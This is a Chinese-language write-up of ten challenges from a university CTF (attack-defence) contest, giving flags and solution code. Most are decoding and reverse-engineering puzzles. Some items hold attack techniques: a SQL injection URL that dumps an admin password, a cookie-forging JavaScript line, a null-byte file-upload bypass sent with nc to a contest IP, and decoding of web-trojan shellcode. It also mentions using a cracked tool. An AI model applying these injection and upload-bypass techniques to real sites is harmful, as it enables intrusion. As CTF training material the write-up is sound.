【写在开篇】
http://218.195.96.59/index.asp
汉中高校攻防赛入口。挺有意思的,大家可以玩玩。
============================================================================
1.
修改网页源代码,出来一个隐藏的text框框(显示的框框要填50),往里面填:Icanseeit
出来:key:HiddenNotHere
2.
unicode(base64(jpg))
解析后:anBn
一看就是base64加密,解密后发现是一堆16进制的字符,我果断想到了把它们写到2进制文件中
然后看生成的文件是图片格式:FFD8-FFD9,改后缀为jpg,就出来key
#include <iostream>
#include <fstream>
#include <list>
#include <string>
#include <iterator>
#include <stdio.h>
#include <stdlib.h>
#include <sstream>
using namespace std;
int main()
{
freopen("1.jpg","wb",stdout);
stringstream ss;
stringstream outss;
ss<<"FFD8FFE000104A46494600010101006000600000FFDB004300080606070605080707070909080A0C140D0C0B0B0C1912130F141D1A1F1E1D1A1C1C20242E2720222C231C1C2837292C30313434341F27393D38323C2E333432FFDB0043010909090C0B0C180D0D1832211C213232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232FFC0001108001E00E003012200021101031101FFC4001F0000010501010101010100000000000000000102030405060708090A0BFFC400B5100002010303020403050504040000017D01020300041105122131410613516107227114328191A1082342B1C11552D1F02433627282090A161718191A25262728292A3435363738393A434445464748494A535455565758595A636465666768696A737475767778797A838485868788898A92939495969798999AA2A3A4A5A6A7A8A9AAB2B3B4B5B6B7B8B9BAC2C3C4C5C6C7C8C9CAD2D3D4D5D6D7D8D9DAE1E2E3E4E5E6E7E8E9EAF1F2F3F4F5F6F7F8F9FAFFC4001F0100030101010101010101010000000000000102030405060708090A0BFFC400B51100020102040403040705040400010277000102031104052131061241510761711322328108144291A1B1C109233352F0156272D10A162434E125F11718191A262728292A35363738393A434445464748494A535455565758595A636465666768696A737475767778797A82838485868788898A92939495969798999AA2A3A4A5A6A7A8A9AAB2B3B4B5B6B7B8B9BAC2C3C4C5C6C7C8C9CAD2D3D4D5D6D7D8D9DAE2E3E4E5E6E7E8E9EAF2F3F4F5F6F7F8F9FAFFDA000C03010002110311003F00F63BCD52E05C3C71908A8C5781927F3AAD79AE4963A67DB2E2E4471AB36F7283007CB8EDEF5CDEB1776D6DE22BEB3B9F885A3E9F708C2636D736E8A625724AAEE69064E07D70412006197F8C6D2E2C3C077B6D7774B753A07DD32C5E586CEC23E5C9C7040EBDAA6CC64FFF000B174AFF00A0DC1FF7CFFF005A8FF858BA57FD06E0FF00BE7FFAD57E5F885A758EB1E2AB6D593EC563E1FF00B2799799693CCF3D723E455C8C120719CE73C5686A5E36F0EE91A8CD637DA8797341E57DA184323C76DE69C47E6C8AA522DC7A6F238C1E8734EC17303FE162E95FF41B83FEF9FF00EB51FF000B174AFF00A0DC1FF7CFFF005AB7F50F1B78774BFED8FB6EA1E57F63791F6FFDCC8DE4F9D8F2FA29DD9C8FBB9C77C558D63C53A3683A8E9761A9DE79175AA4BE4D9A794EDE6BE54632A081CBAF5C75A2C17398FF00858BA57FD06E0FFBE7FF00AD47FC2C5D2BFE83707FDF3FFD6ADFD43C6DE1DD2FFB63EDBA8795FD8DE47DBFF7323793E763CBE8A776723EEE71DF151DF78F7C37A6EA977A75E5FC914F64F125D39B598C56E65C797E64A136203B872580FC8D160B989FF0B174AFFA0DC1FF007CFF00F5A8FF00858BA57FD06E0FFBE7FF00AD5AFA8F8A1ADFC77A2E810CD046B75E7FDA12E6D2E03CBB620EBE44817CA6C7F1E5B8E075E2AC6A5E36F0EE91A8CD637DA8797341E57DA184323C76DE69C47E6C8AA522DC7A6F238C1E8734582E607FC2C5D2BFE83707FDF3FF00D6A3FE162E95FF0041B83FEF9FFEB56FEA5E36F0EE91A8CD637DA8797341E57DA184323C76DE69C47E6C8AA522DC7A6F238C1E873597E35F891A67846C35168E29351D42C12179AD225936C62470ABE64AA8C919232406C13818EA28B05CA9FF000B174AFF00A0DC1FF7CFFF005A8FF858BA57FD06E0FF00BE7FFAD5BFA978DBC3BA46A3358DF6A1E5CD0795F68610C8F1DB79A711F9B22A948B71E9BC8E307A1CD1AB789FEC3E28D1FC3D6767F6CBEBFDF2CDFBDDAB6B6E83E695F018F270AA08019B2370A2C17303FE162E95FF0041B83FEF9FFEB51FF0B174AFFA0DC1FF007CFF00F5AADBFC48D32CFC59AE68BAAC525941A5BDAA7DB8AC9244C67504798CA9B61009032ED839ED835B9AC78A349D02545D5269EDA36D99B86B494C09B9B6AEF98298D39C7DE618C827834582E731FF000B174AFF00A0DC1FF7CFFF005A8FF858BA57FD06E0FF00BE7FFAD5D1DE78BB47B2D527D31A4BBB8BCB74479E2B2B19EE8C21F3B77F948C14900900E0E39E86A3D4BC6DE1DD23519AC6FB50F2E683CAFB43086478EDBCD388FCD9154A45B8F4DE47183D0E68B05CC0FF00858BA57FD06E0FFBE7FF00AD47FC2C5D2BFE83707FDF3FFD6ABFAC78FACF4FF1CE97E15B63633DDDCFCD76D3DF083ECAA4A8400153E648FBBE58C1DDD09C29DC0D6FE2169DE1CF15CFA4EAC9F67B1834A5D4A4BECB3EDDD38842796AA49E483907F0EF4582E50FF858BA57FD06E0FF00BE7FFAD47FC2C5D2BFE83707FDF3FF00D6ADFD5BC4FF0061F1468FE1EB3B3FB65F5FEF966FDEED5B5B741F34AF80C7938550400CD91B8557F1578A1B44D4744B18268219AFB5082076BBB4B868DE372C0A47246A504C48E0310319278E68B05CC8FF00858BA57FD06E0FFBE7FF00AD47FC2C5D2BFE83707FDF3FFD6ADBBEF1EF86F4DD52EF4EBCBF9229EC9E24BA736B318ADCCB8F2FCC9426C40770E4B01F91A35AF1EF86FC3F717506A37F223D9A46F7462B59A65B7121C2798D1A3042DD83104E47A8A2C17313FE162E95FF0041B83FEF9FFEB51FF0B174AFFA0DC1FF007CFF00F5AB7F56F13FF62F8A347D2EF2CF6D8EABBE286FFCDC2C7700656270400378CED218966046DEF46ADE27FEC5F1468FA5DE59EDB1D577C50DFF009B858EE00CAC4E08006F19DA4312CC08DBDE8B05CC0FF858BA57FD06E0FF00BE7FFAD5A7A1F8DF4DD5B52874F86FE09E69776D0A0863805BE9D01AD0F09CF35CE8F70F3CB24AE353BF40CEC58855BB995473D828000EC0015B94582E737AE68DA936A916ABA33C6F70EF025DDBCF74D6E92C30F9EC803A23303E64AA48E8C1369E09071BE20199BC1B7CD711C71CE63CC891B97556DB1E406201233DF033E82BBDACCD7342B4D7F4D9AC6E8C891CA30CF0901BB7A823B0EDDA9B11C16B5F0E358BAF17EBBE26B0B9B117D25DD85DE971DCBBB43BA18CC7209E3DA41E09DACBF329E432F39B1AAFC376D4BC69ADEA17B6F06A3A46B5F64F3E07D4EE2D0C3E50DA729182B374561B8AE0F1C753E914500787F8C34AFEDAF16F88B41D16FEC75293C552D947762DA6DF3694B6AC04AF2201B4A8C28F99D18B36D00915EB1AC7FC249FDA3A5FF627F657D87CDFF898FDB7CCF33CBCAFFA9DBC6EC6FF00BDC676FBD6C51401E57E32F873AF6B171E2F5D2E5D35E0F12258967BA9DE26B66B72380AB1B070C00E72B8C9E0E3993C51F0E358D6FF00E13DFB35CD8A7FC243FD9FF64F31DC6CFB3EDDFE6614E338E319F7C57A851401C3F89341F126A3E3BD035CB0B5D29AD745FB46C49EFA48DE7F3A20872042C136907BB67DA83E1BF12697E34F106B3A249A53C7ADFD8F7BDEB499B5F24146C46A3F7B95391F3A73C74193DC51401E5FE2AF871AC6B5A8F8A92CEE6C458F897EC1E74D33BAC969F672376D40A44B90011964E4E3DEA3F197C39D7B58B8F17AE972E9AF078912C4B3DD4EF135B35B91C0558D8386007395C64F071CFAA51401E6FAAFC376D4BC69ADEA17B6F06A3A46B5F64F3E07D4EE2D0C3E50DA729182B374561B8AE0F1C753A1AB585E69BF16B47F1147693DD58DF69EFA3DC343196FB236FF003639182E4956395270157A96E715DC51401E57E26F873AF6B7AA78C23825D363D3FC48F600CEF3BF9B6CB6FB771F2C47872707037AF6E7D24F883E02F13F8AE5D621B6D46096C6F62B65B48E7BE9ADD2CCC6DBA40628D5926DE70773F2BDBEE8AF50A280383F13784F59D4759B8BDD063B4D22F277B70DABC5A94EB232C6C0E64B554114C40DEA03B1C823240E053D57E1BB6A5E34D6F50BDB78351D235AFB279F03EA7716861F286D3948C159BA2B0DC57078E3A9F48A2803CBFC55F0E358D6B51F15259DCD88B1F12FD83CE9A677592D3ECE46EDA814897200232C9C9C7BD58F1F7C2F97C4F06B777A6EAD3A6A7A945041E55DB21B758E3756D80F96D22292A5F0AC017C135E9145007077DA65F68FF14B42D784777A8DA5DE98DA35D4EB165ADDC3F9A92B88D790EC0A9215557A920102A9FC49BFB3BED63C23A459DDC171A9C1E25B39E6B28640F3471AABB33B20F9828520924600E6BD228A00F13D57C3BA978BBC6FF12BC3F646D2282F5F491737534AC1A05540F948C29121214F0593B73CF14FE29D9FD925F1AC565A8E957B75E20FECD43A72DDE2FA2922650AA90056326E055BAA9009E0E39F78A280387F1AD85E7883C51E13D22DAD2716F67A82EB1777DE59F2E15841D91E4E1599D9B180DB940C95228F1AD85E7883C51E13D22DAD2716F67A82EB1777DE59F2E15841D91E4E1599D9B180DB940C9522BB8A28039FF06FFC80EE7FEC2BA97FE96CD5D05470C10DB2148228E242ECE5514282CCC598F1DCB1249EE493525007FFD9";
char ch[2];
while(ss>>ch[0]>>ch[1])
{
outss.clear();
outss<<ch[0]<<ch[1]<<endl;
int i;
outss>>hex>>i;
printf("%c",(char)i);
}
return 0;
}
3.
key:ar4itraryfilesdownlo1ded
星星点灯.mp3的url是经过两次base64编码,那么我们就把title所写的:key.txt
也经过两次base64编码,出来一个信息是:iskey.txt,再2次base64,出来一个showkey.jsp
再来两次base64,爆出key。
这道题不是我想出来的,思路很奇葩,果然是要敢想敢做。
4.
就是一个简单的注入:
http://218.195.96.29/asp/1/tume.asp?id=11'%20Union%20Select%201,password%20from%20admin%20where%20'1'='1
KEY:4b378055b5b521da6e2b7536e21b22c1
MD5解密后:crackmd5
5.
一看就知道是cookie修改: javascript:document.cookie="level="+escape("admin");
然后刷新一下就好了:Smart Boy,KeY Is admin888
6.
Key:QRSTUVWXYZabcdef
竟然是个rar文件
把网马解密后出现后的shellcode拿下来:
#include <iostream>
#include <fstream>
#include <list>
#include <string>
#include <iterator>
#include <stdio.h>
#include <stdlib.h>
#include <sstream>
using namespace std;
int main()
{
freopen("1.txt","wb",stdout);
stringstream ss;
stringstream outss;
ss<<"%u6152%u2172%u071A%uCE00%u7399%u0080%u000D%u0000%u0000%u0000%u6063%u155D%u3E7B%u3C8F%u860D%u76D2%uBE49%uC5AF%uA3F0%u2683%u3B73%uBB72%uBE19%u8928%uAEA2%u9A6E%uDBCA%u06DD%uB1F3%u2FFC%u93CE%u4C1E%uAC6E%u9727%u431E%u82EB%u9FC1%u8095%u7AB4%u266B%uD2C4%uAEC6%u28DD%u9E2E%uA4FE%u5FE6%uADA2%uDD57%uE407%uA291%uF9F7%u86B5%uE867%u5672%u5293%u23C7%u0D47%u705C%uCDD9%u3D9B%u7E0A%uC9B6%u2239%u0337%u7878%u3165%uB8BF%u634F%uC4BB%u1649%u6063%u155D%u3E7B%u3C8F%u0BBF%uDEAE%u40D6%u7D01%uB93F%u944C%u9940%uB608";
char ch[2],curch[2];
int flag=0;
while(ss>>curch[0]>>curch[1])
{
if(curch[0] == '%' &&curch[1] == 'u')
continue;
if(flag^=1)
{
ch[0]=curch[0];
ch[1]=curch[1];
}
if(!flag)
outss<<curch[0]<<curch[1]<<ch[0]<<ch[1];
}
int i;
while(outss>>ch[0]>>ch[1])
{
stringstream ts;ts<<ch[0]<<ch[1]<<endl;
ts>>hex>>i;
printf("%c",char(i));
}
return 0;
}
发现是一个加密的rar,暴力破解是人是sb。
我在页面上找msg一个个填进去,填到:QRSTUVWXYZabcdef 成功。
7.
先抓包,存在packet.txt中,用UE打开,在1.asp.;.jpg这里把
asp后面的字节用00代替。
用nc post发送这个包:C:\>nc.exe 218.195.96.29 80 < packet.txt
收到的回馈是:Key is uPloaD00CrACkThaT<center>上传成功
8.
不断地转转。。
msgbox "Can u get this key?~,~!"rem "Key is PasSTHeVbSDeCOd3
(用生成的文件中的字符串代替输入到ss中。。)
不过倒是学会了vb的一个函数: Split(expression[, delimiter[, count[, compare]]])
count为-1的时候,表示所有子字符串
compare为1的时候,表示文字比较。貌似0为2进制比较?
#include <iostream>
#include <cstdio>
#include <math.h>
#include <cstring>
#include <sstream>
#include <stdio.h>
using namespace std;
int main()
{
freopen("1.txt","w",stdout);
stringstream ss,ts;
ss<<"109,115,103,98,111,120,32,34,67,97,110,32,117,32,103,101,116,32,116,104,105,115,32,107,101,121,63,126,44,126,33,34,114,101,109,32,34,75,101,121,32,105,115,32,80,97,115,83,84,72,101,86,98,83,68,101,67,79,100,51,34";
char ch[3];
while(ss>>ch[0])
{
if(ch[0]==',')
{
ts<<endl;
int i;
ts>>i;
printf("%c",char(i));
ts.clear();
}
else
{
ts<<ch[0];
}
}
return 0;
}
9.
这个只能静态分析,而不是OD下搞起。
IDA下找到关键代码:
.text:00401564 mov al, 31h
.text:00401566 mov cl, 42h
.text:00401568 mov [esp+0Bh], al
.text:0040156C mov [esp+0Eh], al
.text:00401570 mov al, 52h
.text:00401572 push edi
.text:00401573 mov [esp+15h], al
.text:00401577 mov [esp+18h], cl
.text:0040157B mov [esp+19h], cl
.text:0040157F mov [esp+1Ah], al
.text:00401583 mov [esp+1Dh], al
.text:00401587 lea edi, [esp+0Ch]
.text:0040158B or ecx, 0FFFFFFFFh
.text:0040158E xor eax, eax
.text:00401590 mov byte ptr [esp+0Ch], 5Ah
.text:00401595 mov byte ptr [esp+0Dh], 74h
.text:0040159A mov byte ptr [esp+0Eh], 68h
.text:0040159F mov byte ptr [esp+10h], 78h
.text:004015A4 mov byte ptr [esp+11h], 62h
.text:004015A9 mov byte ptr [esp+13h], 5Ch
.text:004015AE mov byte ptr [esp+14h], 77h
.text:004015B3 mov byte ptr [esp+16h], 41h
.text:004015B8 mov byte ptr [esp+17h], 70h
.text:004015BD mov byte ptr [esp+1Bh], 63h
.text:004015C2 mov byte ptr [esp+1Ch], 25h
.text:004015C7 mov byte ptr [esp+1Eh], 7Ah
.text:004015CC mov byte ptr [esp+1Fh], 56h
.text:004015D1 mov byte ptr [esp+20h], 21h
.text:004015D6 mov byte ptr [esp+21h], 5Eh
.text:004015DB mov byte ptr [esp+22h], 75h
.text:004015E0 mov byte ptr [esp+23h], 0
.text:004015E5 xor edx, edx
.text:004015E7 repne scasb
.text:004015E9 not ecx
.text:004015EB dec ecx
.text:004015EC jz short loc_40160C
.text:004015EE
.text:004015EE loc_4015EE: ; CODE XREF: .text:0040160Aj
.text:004015EE mov cl, [esp+edx+0Ch]
.text:004015F2 lea edi, [esp+0Ch]
.text:004015F6 xor cl, 11h
.text:004015F9 xor eax, eax
.text:004015FB mov [esp+edx+0Ch], cl
.text:004015FF or ecx, 0FFFFFFFFh
.text:00401602 inc edx
.text:00401603 repne scasb
.text:00401605 not ecx
.text:00401607 dec ecx
.text:00401608 cmp edx, ecx
.text:0040160A jb short loc_4015EE
.text:0040160C
.text:0040160C loc_40160C: ; CODE XREF: .text:004015ECj
.text:0040160C push 0
.text:0040160E lea eax, [esp+10h]
.text:00401612 push 0
.text:00401614 push eax
.text:00401615 call ?AfxMessageBox@@YGHPBDII@Z ; AfxMessageBox(char const *,uint,uint)
.text:0040161A pop edi
大意:有一个字符串,它以esp+OCH开始。然后每个字符xor一个0x11,用c++写了下:
其中的"Zth0x0b\wRApBBRc%RzV!^u"是把esp+0CH用2进制写到文件的生成的字符串。
#include <iostream>
#include <fstream>
#include <list>
#include <string>
#include <iterator>
#include <stdio.h>
#include <stdlib.h>
#include <sstream>
using namespace std;
int main()
{
freopen("1.txt","wb",stdout);
stringstream ss;
stringstream outss;
ss<<"Zth0x0b\wRApBBRc%RzV!^u";
string s="Zth0x0b\wRApBBRc%RzV!^u";
for(int i=0;i<s.size();i++)
{
s[i]=(int)s[i]^0x11;
printf("%c",(char)s[i]);
}
return 0;
}
然后生成的文件为:Key!i!sfCPaSSCr4CkG0Od
Ps:!(感叹号)是因为[esp+0Fh]、[esp+12h]都没有,我就用“0”代替了,结果果然不影响,哈哈。
10.
key:.Ne7c#CR4cK1sG0Ok
发现它是用C# dotnet写的,果断上.NET Reflector 7.0.0.420 Crack
然后源代码就出来了,逆推key就行。